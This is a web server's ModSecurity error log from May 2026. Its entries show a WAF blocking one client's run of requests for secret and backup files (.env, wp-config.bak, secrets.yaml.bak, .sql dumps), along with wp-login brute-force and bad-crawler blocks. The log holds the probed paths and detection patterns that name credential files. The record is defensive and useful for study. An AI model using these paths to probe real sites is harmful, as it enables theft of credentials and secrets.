[Tue May 26 19:51:08.619714 2026] [security2:error] [pid 86490:tid 86685] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/user/.env.bak"] [unique_id "ahWsVFZMwN0DpLVWo6KT4gAAAMY"]
[Tue May 26 19:51:09.749389 2026] [security2:error] [pid 86490:tid 86739] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/coupons/.env"] [unique_id "ahWsVVZMwN0DpLVWo6KUBgAAAPw"]
[Tue May 26 19:51:10.233019 2026] [security2:error] [pid 86490:tid 86717] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/secrets.yaml.bak"] [unique_id "ahWsVlZMwN0DpLVWo6KUGwAAAOY"]
[Tue May 26 19:51:10.270502 2026] [security2:error] [pid 86490:tid 86691] [client 153.75.250.143:62938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 143.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thedebateafrica.org"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahWsVlZMwN0DpLVWo6KUGgAAAMw"]
[Tue May 26 19:51:10.370510 2026] [security2:error] [pid 86490:tid 86726] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsVVZMwN0DpLVWo6KUEgAAAO8"]
[Tue May 26 19:51:10.557069 2026] [security2:error] [pid 86490:tid 86651] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/config/settings.bak"] [unique_id "ahWsVlZMwN0DpLVWo6KUMgAAAKQ"]
[Tue May 26 19:51:10.831943 2026] [security2:error] [pid 86490:tid 86645] [client 172.226.44.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWsVlZMwN0DpLVWo6KUNQAAAJ4"]
[Tue May 26 19:51:11.042555 2026] [security2:error] [pid 86490:tid 86641] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lib/.env"] [unique_id "ahWsV1ZMwN0DpLVWo6KURgAAAJo"]
[Tue May 26 19:51:11.686338 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/postgres.php.old"] [unique_id "ahWsV1ZMwN0DpLVWo6KUWAAAAJU"]
[Tue May 26 19:51:11.846872 2026] [security2:error] [pid 86490:tid 86732] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.template.backup"] [unique_id "ahWsV1ZMwN0DpLVWo6KUXAAAAPU"]
[Tue May 26 19:51:12.008270 2026] [security2:error] [pid 86490:tid 86679] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/config/wp-config.bak"] [unique_id "ahWsWFZMwN0DpLVWo6KUZAAAAMA"]
[Tue May 26 19:51:12.168696 2026] [security2:error] [pid 86490:tid 86656] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/settings.bak"] [unique_id "ahWsWFZMwN0DpLVWo6KUbwAAAKk"]
[Tue May 26 19:51:12.177638 2026] [security2:error] [pid 86490:tid 86702] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsV1ZMwN0DpLVWo6KUWwAAANc"]
[Tue May 26 19:51:12.365753 2026] [security2:error] [pid 86490:tid 86519] [remote 49.12.3.147:34978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWsWFZMwN0DpLVWo6KUcgAA4Bw"]
[Tue May 26 19:51:12.814001 2026] [security2:error] [pid 86490:tid 86739] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ldap/.env"] [unique_id "ahWsWFZMwN0DpLVWo6KUfgAAAPw"]
[Tue May 26 19:51:13.296249 2026] [security2:error] [pid 86490:tid 86648] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/mariadb/.env"] [unique_id "ahWsWVZMwN0DpLVWo6KUmAAAAKE"]
[Tue May 26 19:51:13.616831 2026] [security2:error] [pid 86490:tid 86650] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/solr/.env"] [unique_id "ahWsWVZMwN0DpLVWo6KUowAAAKM"]
[Tue May 26 19:51:14.100255 2026] [security2:error] [pid 86490:tid 86637] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/branches/.env"] [unique_id "ahWsWlZMwN0DpLVWo6KUuAAAAJY"]
[Tue May 26 19:51:14.406260 2026] [security2:error] [pid 86490:tid 86653] [client 104.155.124.229:44596] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWsWlZMwN0DpLVWo6KUwgAAAKY"]
[Tue May 26 19:51:14.421023 2026] [security2:error] [pid 86490:tid 86681] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/rollup.config.js.bak"] [unique_id "ahWsWlZMwN0DpLVWo6KUyQAAAMI"]
[Tue May 26 19:51:14.743894 2026] [security2:error] [pid 86490:tid 86721] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/tmp/config.bak"] [unique_id "ahWsWlZMwN0DpLVWo6KU0wAAAOo"]
[Tue May 26 19:51:14.855524 2026] [security2:error] [pid 86490:tid 86636] [client 104.155.124.229:44596] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWsWlZMwN0DpLVWo6KU0gAAAJU"]
[Tue May 26 19:51:14.904084 2026] [security2:error] [pid 86490:tid 86745] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/golang-app/api/.env"] [unique_id "ahWsWlZMwN0DpLVWo6KU1wAAAQI"]
[Tue May 26 19:51:15.244333 2026] [security2:error] [pid 86490:tid 86656] [client 104.155.124.229:44596] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWsW1ZMwN0DpLVWo6KU5gAAAKk"]
[Tue May 26 19:51:15.469689 2026] [security2:error] [pid 86490:tid 86709] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsW1ZMwN0DpLVWo6KU4QAAAN4"]
[Tue May 26 19:51:15.550163 2026] [security2:error] [pid 86490:tid 86698] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/loggly/.env"] [unique_id "ahWsW1ZMwN0DpLVWo6KU9wAAANM"]
[Tue May 26 19:51:15.873815 2026] [security2:error] [pid 86490:tid 86668] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/verify.php.bak"] [unique_id "ahWsW1ZMwN0DpLVWo6KVBQAAALU"]
[Tue May 26 19:51:16.520077 2026] [security2:error] [pid 86490:tid 86718] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/backup/sample.sql"] [unique_id "ahWsXFZMwN0DpLVWo6KVHQAAAOc"]
[Tue May 26 19:51:16.840785 2026] [security2:error] [pid 86490:tid 86683] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test-become/.env"] [unique_id "ahWsXFZMwN0DpLVWo6KVJwAAAMQ"]
[Tue May 26 19:51:17.461003 2026] [security2:error] [pid 86490:tid 86684] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsXVZMwN0DpLVWo6KVLAAAAMU"]
[Tue May 26 19:51:18.301052 2026] [security2:error] [pid 86490:tid 86671] [client 192.200.148.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsXVZMwN0DpLVWo6KVVAAAALg"]
[Tue May 26 19:51:18.480508 2026] [security2:error] [pid 86490:tid 86726] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.json.bak"] [unique_id "ahWsXlZMwN0DpLVWo6KVcwAAAO8"]
[Tue May 26 19:51:19.331922 2026] [security2:error] [pid 86490:tid 86654] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/application.properties.backup"] [unique_id "ahWsX1ZMwN0DpLVWo6KVkgAAAKc"]
[Tue May 26 19:51:19.841391 2026] [security2:error] [pid 86490:tid 86635] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/sql/log.bak"] [unique_id "ahWsX1ZMwN0DpLVWo6KVogAAAJQ"]
[Tue May 26 19:51:20.009909 2026] [security2:error] [pid 86490:tid 86716] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/whatsapp-bot/.env"] [unique_id "ahWsYFZMwN0DpLVWo6KVwwAAAOU"]
[Tue May 26 19:51:20.019895 2026] [security2:error] [pid 86490:tid 86647] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsX1ZMwN0DpLVWo6KVnAAAAKA"]
[Tue May 26 19:51:20.349161 2026] [security2:error] [pid 86490:tid 86653] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/zones/.env"] [unique_id "ahWsYFZMwN0DpLVWo6KV5QAAAKY"]
[Tue May 26 19:51:21.370522 2026] [security2:error] [pid 86490:tid 86721] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vault/.env"] [unique_id "ahWsYVZMwN0DpLVWo6KWBwAAAOo"]
[Tue May 26 19:51:21.883484 2026] [security2:error] [pid 86490:tid 86742] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/restart/.env"] [unique_id "ahWsYVZMwN0DpLVWo6KWFQAAAP8"]
[Tue May 26 19:51:22.149766 2026] [security2:error] [pid 86490:tid 86638] [client 74.7.244.13:60600] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.marchedesedhiou.com.azurmediatec.com"] [uri "/index.php"] [unique_id "ahWsYlZMwN0DpLVWo6KWKQAAlwk"]
[Tue May 26 19:51:22.501137 2026] [security2:error] [pid 86490:tid 86715] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsYlZMwN0DpLVWo6KWJQAAAOQ"]
[Tue May 26 19:51:22.563925 2026] [security2:error] [pid 86490:tid 86658] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/javascript/.env"] [unique_id "ahWsYlZMwN0DpLVWo6KWMwAAAKs"]
[Tue May 26 19:51:23.416450 2026] [security2:error] [pid 86490:tid 86653] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailgun.php.bak"] [unique_id "ahWsY1ZMwN0DpLVWo6KWTgAAAKY"]
[Tue May 26 19:51:23.525673 2026] [security2:error] [pid 86490:tid 86494] [remote 51.91.98.45:59916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsY1ZMwN0DpLVWo6KWTQAA2wM"]
[Tue May 26 19:51:24.246704 2026] [security2:error] [pid 86490:tid 86626] [client 114.119.156.86:38391] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/athelstan-grandofficers.php"] [unique_id "ahWsZFZMwN0DpLVWo6KWawAAAIs"], referer: https://athelstan.org.in/
[Tue May 26 19:51:25.150478 2026] [autoindex:error] [pid 86490:tid 86649] [client 209.38.233.139:45614] AH01276: Cannot serve directory /home1/vcress4h/vcresco-usa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:51:25.192194 2026] [security2:error] [pid 86490:tid 86614] [remote 176.95.46.127:35070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsZVZMwN0DpLVWo6KWlwAAn3s"]
[Tue May 26 19:51:25.240970 2026] [security2:error] [pid 86490:tid 86714] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsZFZMwN0DpLVWo6KWiwAAAOM"]
[Tue May 26 19:51:25.449173 2026] [security2:error] [pid 86490:tid 86604] [remote 176.95.46.127:35070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsZVZMwN0DpLVWo6KWpQAA5XE"], referer: https://freshmindsolutions.com/wp-login.php
